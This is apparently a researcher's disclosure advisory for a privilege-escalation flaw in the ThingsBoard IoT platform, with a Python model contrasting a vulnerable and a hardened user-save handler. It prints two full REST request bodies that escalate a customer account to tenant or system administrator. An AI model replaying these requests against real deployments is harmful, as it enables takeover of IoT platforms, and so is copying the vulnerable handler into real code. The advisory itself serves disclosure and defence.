In December 2022, a vulnerability was discovered in the ThingsBoard IoT platform through which a normal user's privileges could be escalated with a single POST request carrying an additional header; by exploiting the associated flaws, the attacker could take control over the entire platform and the accounts it manages. The vulnerability was reported to the vendor and was quickly resolved. While the communication was largely one-directional, the time to resolution and patch was swift, and it is always a pleasure to see a development team take user security so seriously.
The vulnerability has been remediated in the latest version of the product, and we strongly urge users of the platform to upgrade to it. This matters most for operators who do not control every end user account: exploitation requires only an authenticated low-privileged account (initial access), after which the attacker can grant that account higher permissions.
The ThingsBoard IoT platform was affected by a vertical privilege escalation vulnerability.
A low-privileged user (CUSTOMER_USER) was able to escalate their privileges vertically and become a tenant administrator (TENANT_ADMIN) or system administrator (SYS_ADMIN) of the web application using a single POST request to the platform's REST API.
To exploit the vulnerability, the attacker only needed to know the name of the relevant API parameter ("authority": "value") and the platform's default UUIDs (for example the system tenant ID), both of which are easily found in ThingsBoard's official GitHub repository.
Our test was run against the latest version available at the time, and we have reason to believe that every deployment of that version is affected.
To verify the vulnerability, our security researcher took the following steps. Both requests are sent with the low-privileged user's own authentication token; the first changes the user's own "authority" to TENANT_ADMIN:
POST https://<thingsboardinstance>/api/user?sendActivationMail=false
{
  "id": {
    "entityType": "USER",
    "id": "XXXXXXXXX"
  },
  "createdTime": 0,
  "additionalInfo": {
    "lastLoginTs": 1668422898320,
    "failedLoginAttempts": 0,
    "userCredentialsEnabled": true,
    "lang": "en_US",
    "homeDashboardHideToolbar": false
  },
  "tenantId": {
    "entityType": "TENANT",
    "id": "XXXXXXXXXX"
  },
  "email": "[email protected]",
  "authority": "TENANT_ADMIN",
  "firstName": "Winston",
  "lastName": null,
  "name": "[email protected]",
  "language": "en_US",
  "homeDashboardHideToolbar": false
}
The second request goes one step further: it sets "authority" to SYS_ADMIN and points "tenantId" at the system tenant's well-known UUID.
POST https://<thingsboardinstance>/api/user?sendActivationMail=false
{
  "id": {
    "entityType": "USER",
    "id": "XXXXXXXXX"
  },
  "createdTime": 0,
  "additionalInfo": {
    "description": "",
    "defaultDashboardId": null,
    "defaultDashboardFullscreen": false,
    "homeDashboardId": null,
    "homeDashboardHideToolbar": false,
    "userCredentialsEnabled": true,
    "failedLoginAttempts": 0,
    "lang": "en_US"
  },
  "tenantId": {
    "entityType": "TENANT",
    "id": "13814000-1dd2-11b2-8080-808080808080"
  },
  "email": "[email protected]",
  "authority": "SYS_ADMIN",
  "firstName": "John",
  "lastName": "Wick",
  "name": "[email protected]",
  "language": "en_US",
  "homeDashboardId": null,
  "homeDashboardHideToolbar": false
}
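The root cause of both requests above is that the server trusted the "authority" and "tenantId" fields of a user record submitted by the very user being modified. The following Python model is an added example written for this advisory; it is not ThingsBoard's code, and the role hierarchy, the ASSIGNABLE policy table, the user IDs and the e-mail addresses are constructed assumptions made to illustrate the point. It replays the request shape from the advisory (a CUSTOMER_USER re-submitting its own record with a raised authority) against a handler that takes the body at face value and against one that treats authority and tenant as server-owned fields, and includes a control case showing a legitimate TENANT_ADMIN action still works under the hardened check.

```python
from dataclasses import dataclass

# The system tenant id that appears in the advisory's SYS_ADMIN request body.
SYS_TENANT_ID = "13814000-1dd2-11b2-8080-808080808080"

# ThingsBoard authorities, lowest to highest privilege.
AUTHORITIES = ("CUSTOMER_USER", "TENANT_ADMIN", "SYS_ADMIN")

# Assumed policy (a simplification for this example, not ThingsBoard's real
# rules): which authorities a caller may assign when creating or editing
# ANOTHER user. A CUSTOMER_USER manages nobody.
ASSIGNABLE = {
    "SYS_ADMIN": {"SYS_ADMIN", "TENANT_ADMIN"},
    "TENANT_ADMIN": {"TENANT_ADMIN", "CUSTOMER_USER"},
    "CUSTOMER_USER": set(),
}


@dataclass
class User:
    id: str
    tenant_id: str
    email: str
    authority: str


class Forbidden(Exception):
    """Raised by the hardened handler when a request must be refused."""


class UserStore:
    def __init__(self):
        self.users = {}

    def add(self, user):
        self.users[user.id] = user
        return user

    def write(self, body):
        """Persist the JSON body as a User (what the save endpoint ultimately does)."""
        user = User(body["id"]["id"], body["tenantId"]["id"], body["email"], body["authority"])
        self.users[user.id] = user
        return user


def save_user_vulnerable(store, caller, body):
    """Checks only that the caller is logged in; every body field, including
    "authority" and "tenantId", is taken at face value."""
    if caller.authority not in AUTHORITIES:
        raise Forbidden("unauthenticated")
    return store.write(body)


def save_user_hardened(store, caller, body):
    """Same endpoint with the authorization decisions the vulnerable one skips."""
    target_id = body["id"]["id"]
    requested = body["authority"]
    tenant_id = body["tenantId"]["id"]
    if requested not in AUTHORITIES:
        raise Forbidden("unknown authority")
    if target_id == caller.id:
        # Self-service profile edit: authority and tenant are server-owned.
        if requested != caller.authority or tenant_id != caller.tenant_id:
            raise Forbidden("a user may not change its own authority or tenant")
    else:
        if requested not in ASSIGNABLE[caller.authority]:
            raise Forbidden(f"{caller.authority} may not assign {requested}")
        existing = store.users.get(target_id)
        if existing is not None and existing.authority not in ASSIGNABLE[caller.authority]:
            raise Forbidden("may not modify a more privileged user")
        if caller.authority != "SYS_ADMIN" and tenant_id != caller.tenant_id:
            raise Forbidden("cross-tenant user management")
    return store.write(body)


def replay_advisory_request(handler, requested_authority, tenant_id=None):
    """Replays the advisory's request shape: the low-privileged user re-submits
    its own record with "authority" raised. Returns the authority stored afterwards."""
    store = UserStore()
    # Constructed sample user; the address is a placeholder, not a real one.
    winston = store.add(User("u-0001", "tenant-0001", "winston@example.invalid", "CUSTOMER_USER"))
    body = {
        "id": {"entityType": "USER", "id": winston.id},
        "tenantId": {"entityType": "TENANT", "id": tenant_id or winston.tenant_id},
        "email": winston.email,
        "authority": requested_authority,
        "firstName": "Winston",
    }
    try:
        handler(store, winston, body)
    except Forbidden:
        pass
    return store.users[winston.id].authority


def legitimate_customer_user_creation():
    """Control case: a TENANT_ADMIN creating a CUSTOMER_USER in its own tenant
    must still succeed under the hardened handler."""
    store = UserStore()
    admin = store.add(User("u-admin", "tenant-0001", "admin@example.invalid", "TENANT_ADMIN"))
    body = {
        "id": {"entityType": "USER", "id": "u-0002"},
        "tenantId": {"entityType": "TENANT", "id": admin.tenant_id},
        "email": "new@example.invalid",
        "authority": "CUSTOMER_USER",
    }
    return save_user_hardened(store, admin, body).authority


if __name__ == "__main__":
    for handler in (save_user_vulnerable, save_user_hardened):
        print(handler.__name__, "->",
              replay_advisory_request(handler, "TENANT_ADMIN"),
              replay_advisory_request(handler, "SYS_ADMIN", SYS_TENANT_ID))
```

The important design choice is that the hardened handler never compares the requested authority against the caller's claimed role in the body; it compares it against the authenticated caller's stored record, and refuses any self-edit that touches authority or tenant at all. Any user-management endpoint that round-trips the full entity from the client needs that kind of check on every privilege-bearing field, not just on whether the caller is logged in.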
In the following screenshots, you can see how the low-privileged user is able to access administrator resources.
Here is the low-privileged user with their original ID and token:
Here is the information that the low-privileged user can access before the escalation:
Here is what it looks like after the user escalates their permissions to Tenant Admin:
To remediate this vulnerability, update to the latest version of the ThingsBoard IoT platform.